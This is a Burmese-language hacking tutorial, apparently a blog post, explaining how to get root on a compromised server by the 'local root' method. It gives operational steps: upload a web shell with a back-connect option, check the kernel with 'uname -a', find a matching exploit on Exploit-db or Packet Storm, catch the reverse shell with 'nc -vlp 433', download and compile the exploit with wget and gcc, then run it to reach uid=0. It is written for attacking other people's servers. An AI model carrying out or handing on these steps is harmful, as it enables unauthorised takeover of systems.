Root ဆိုတာဘာလဲ

Root ဆိုတာ အၾကမ္းဖ်င္းအားျဖင့္ Server တစ္ခုရဲ ့Administrator ျဖစ္ေအာင္လုပ္လုိက္တာပါပဲ။
တကယ္လို ့ သင္သာ server တစ္ခုရဲ ့ root access ရလို ့ကေတာ့ အဲ့ server ကို သင္လုပ္ခ်င္သလိုလုပ္လို ့ရပါျပီ။
အဲ့ေလာက္ဆို ဘာလို ့ Server တစ္ခုကို Hack ဖို ့အတြက္ root access ရဖို ့ဘာလို ့အေရးၾကီးသလဲဆိုတာ သေဘာေပါက္ေလာက္ျပီထင္တယ္။

Root ဘယ္လိုေဖာက္ၾကမလဲ

Server တစ္ခုကို ေဖာက္ဖို ့အတြက္ root ေဖာက္နည္း ( ၃ ) နည္းရွိပါတယ္။
( က်ေနာ္သိသေလာက္ေျပာတာပါ က်ေနာ္ကိုယ္တိုင္လဲ Hacking ပိုင္းမွာ ဆရာမက် ေသးေတာ့ တစ္ျခားနည္းေတြလည္း ရွိခ်င္ရွိအံုးမွာပါ။ )

၁။ Local Root.
၂။ SQL by reading same important files on it root password.
၃။ exploit on software (Buffer Overflow).

ဒီပိုစ့္ မွာေတာ့ Local Root အေၾကာင္းကို ရွင္းလင္းျပသေပးသြားမွာျဖစ္ပါတယ္။







Shell ကို server ေပၚ upload လုပ္ျပီးတဲ့ အခါ root access ရဖို ့အတြက္ back connect လုပ္ျပီး local root ကို run ရပါမယ္။ ဒါဟာ ေနာက္အဆင့္မွာ ေဖာ္ျပမယ့္ local root ကို ဘယ္လို ရွာရမလဲ ဆိုတာနဲ ့ root access ရေအာင္ဘယ္လို လုပ္ရမယ္ဆိုတာရဲ ့ Basic Concept ေလးပါ။

Local Root ကို ဘယ္လိုရွာၾကမလဲ

အရင္ဆံုး kernel version ဘယ္ေလာက္လဲဆုိတာသိရပါ့မယ္။
kernel version ကို သင့္ရဲ ့ shell ကေနတဆင့္သိႏိုင္ပါတယ္။ (ဥပမာ ။ ။ This version is 2.6.18 - 2012)


ဒါမွမဟုတ္ သင့္ ရဲ ့ shell မွာ  "uname -a" ဆိုျပီး Execute လုပ္ျပီးရွာရင္လဲ kernal version သိႏုိင္ပါတယ္။

local root ကို provide လုပ္ေပးတဲ ့ website ေတြျဖစ္တဲ ့ Exploit-db တို ့Packet Storm တို ့လို site ေတြမွာ ရွာေဖြလုိ ့ရပါတယ္။

ေနာက္တစ္ခ်က္ သတိထားရမွာက local root မွာ
1. Local.C : which are not ready.
2. Local : ready to use.
ဆိုျပီး (၂) မ်ိဳး ရွိတယ္ဆိုတာပါပဲ။

Root Access ဘယ္လို ယူမလဲ

အရင္ဆံုးလိုအပ္တာကေတာ့ သင့္မွာ ေအာက္က ပံုထဲကလို Back Connect Option ပါတဲ့ Shell တစ္ခုလိုပါတယ္။







Server မွာ Public IP Address ကို ရိုက္ထည့္ရပါမယ္။
Port မွာ connect လုပ္ခ်င္တဲ့ port ကို ျဖည့္လိုက္ပါ။
ဒါဆိုရင္ေတာ့ back connect ျဖစ္သြားျပီျဖစ္ပါတယ္။

ဒီေနရာမွာေတာ့ BackTrack အသံုးျပဳဖို ့လို အပ္လာပါျပီ

Terminal ကို ဖြင့္လိုက္ပါ။
 ျပီးရင္ေတာ့ ေအာက္မွာေဖာ္ျပထားေသာ အဆင့္မ်ားကို ျပဳလုပ္ပါ။

၁။  nc -vlp 433 လို ့ရိုက္ထည့္လိုက္ပါ။
၂။ Wget [**** local-Root.zip]  (**** ေနရာမွာ local-Root.zip ရွိတဲ့ link ကိုျဖည့္ပါ)
၃။ unzip local-Root.zip
၄။ chmod 777 local.c
၅။ local root ကို ေျပာင္းဖို ့အတြက္ local.c > local
gcc local.c -o local  ဒီလိုဆိုရင္ local c ကေန local ကိုေျပာင္းသြားတာ ေတြ ့ရပါမယ္။
၆။ chmod 777 local
၇။  ./local to local root work
၈။ su

ဒါဆုိရင္ေတာ့  uid=0(root) gid=0(root) groups=0(root)  ဒီလိုေလးျဖစ္သြားပါလိမ့္မယ္။
သေဘာက UID=0 ဆိုတာ root access ရသြားျပီလို ့ေျပာတာျဖစ္ပါတယ္။


Root Access ရျပီဆိုရင္ေတာ့ ဒါေတြ လုပ္လို ့ရျပီ